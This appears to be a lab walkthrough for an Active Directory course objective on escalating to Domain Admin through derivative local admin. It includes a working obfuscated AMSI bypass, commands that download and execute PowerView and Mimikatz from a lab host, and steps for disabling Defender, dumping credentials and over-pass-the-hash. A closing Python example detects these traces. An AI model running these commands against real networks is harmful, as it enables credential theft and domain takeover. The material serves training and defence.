Obj 7 Derivative Local Admin

Task - Target a machine where a domain admin has a session and compromise that machine to escalate privileges to Domain Admin.

Run the AMSI bypass on the machine

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Load PowerView onto the machine

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Find where domain users have sessions

Find-DomainUserLocation

Check whether we can run commands on the machines where sessions were found

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Get Mimikatz on the Target Machine

iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)

Create a new session for Target Machine

Disable Protections and AMSI on Target Machine

Now we can Invoke Mimikatz on Target Machine to Get Creds

Now we can use Over Pass the Hash with Rubeus

We can use Rubeus, Mimikatz or SafetyKatz for this.

Rubeus Over Pass The Hash

Mimikatz Over Pass The Hash

SafetyKatz Over Pass The Hash

- DERIVATIVE LOCAL ADMIN -

In the session we created with the svcadmin creds above, we check which machines we can access as local admin.

We can start a PSSession on any of the machines we find.

First we check which language mode we are in.

Next we check the AppLocker policy to see whether, and from where, we can run scripts.

We can now disable Windows Defender and AMSI in the session

Create a Modified Mimikatz script to execute on load

Now we can transfer the new file over

We copy it from our foothold machine, in the process created for svcadmin.

Back on the Target Machine we can invoke Mimikatz

Over Pass the Hash with SafetyKatz

Again, we can use SafetyKatz, Rubeus or Mimikatz for this. We use one of the credentials found in the previous hash dump.

In the new process that started, we run Invisi-Shell and look for PSRemoting local admins again.

Extract credentials from our findings using SafetyKatz

We could use Mimikatz for this, but this time we use SafetyKatz, so we need to copy loader.exe to the target machine first.

We can now winrs or PSRemote in and Invoke SafetyKatz

We can do the same as above with Mimikatz to dump the credentials of the target machine:

  1. First we need to disable AMSI on the target machine (copy and paste the AMSI bypass)

  2. Download and execute Invoke-Mimikatz.ps1: iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)

  3. On the target machine run: Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

We can also dump credentials from the credentials vault with mimikatz

Finally, we use Over Pass the Hash with the svcadmin credentials to start a new process as Domain Admin
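As an added detection example (not part of these notes or of any tool they use): a Python check over constructed Security log events for the two traces this chain leaves, a privileged account's session on a host outside tier 0 (the very thing Find-DomainUserLocation enumerates) and an RC4-negotiated TGT request, which is what over-pass-the-hash produces when it is fed an NTLM hash instead of an AES key. The event layout, host names, tier-0 set and privileged-account list are assumptions.

```python
"""Added example, not from the original notes. Flattened event dicts stand in
for Windows Security log records; all values below are constructed."""

TIER0_HOSTS = {"DCORP-DC"}                    # assumption: only the DC is tier 0
PRIVILEGED = {"svcadmin", "administrator"}    # assumption: DA-level accounts
RC4_HMAC = "0x17"                             # 4768 TicketEncryptionType for RC4-HMAC

# Constructed sample events: 4624 = logon, 4768 = Kerberos TGT request.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "student1", "Computer": "DCORP-STUDENT1", "LogonType": "2"},
    {"EventID": 4624, "TargetUserName": "svcadmin", "Computer": "DCORP-MGMT", "LogonType": "3"},
    {"EventID": 4624, "TargetUserName": "svcadmin", "Computer": "DCORP-DC", "LogonType": "10"},
    {"EventID": 4768, "TargetUserName": "svcadmin", "IpAddress": "10.0.0.25", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "student1", "IpAddress": "10.0.0.30", "TicketEncryptionType": "0x12"},
]


def privileged_logons_off_tier0(events):
    """Privileged accounts logging on to hosts outside tier 0. Each such session
    is a credential an attacker with local admin on that host can harvest."""
    hits = []
    for e in events:
        if e.get("EventID") != 4624:
            continue
        user = e["TargetUserName"].lower()
        host = e["Computer"].upper()
        if user in PRIVILEGED and host not in TIER0_HOSTS:
            hits.append((user, host, e["LogonType"]))
    return hits


def rc4_tgt_requests(events):
    """TGT requests negotiated with RC4-HMAC. In a domain where AES is the norm
    these stand out; accounts that are legitimately RC4-only are the
    false-positive class to baseline before alerting."""
    return [(e["TargetUserName"].lower(), e["IpAddress"])
            for e in events
            if e.get("EventID") == 4768 and e.get("TicketEncryptionType") == RC4_HMAC]


def hunt(events):
    """Run both checks and return the findings keyed by check name."""
    return {"priv_logons": privileged_logons_off_tier0(events),
            "rc4_tgts": rc4_tgt_requests(events)}


if __name__ == "__main__":
    for kind, findings in hunt(SAMPLE_EVENTS).items():
        for finding in findings:
            print(kind, *finding)
```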
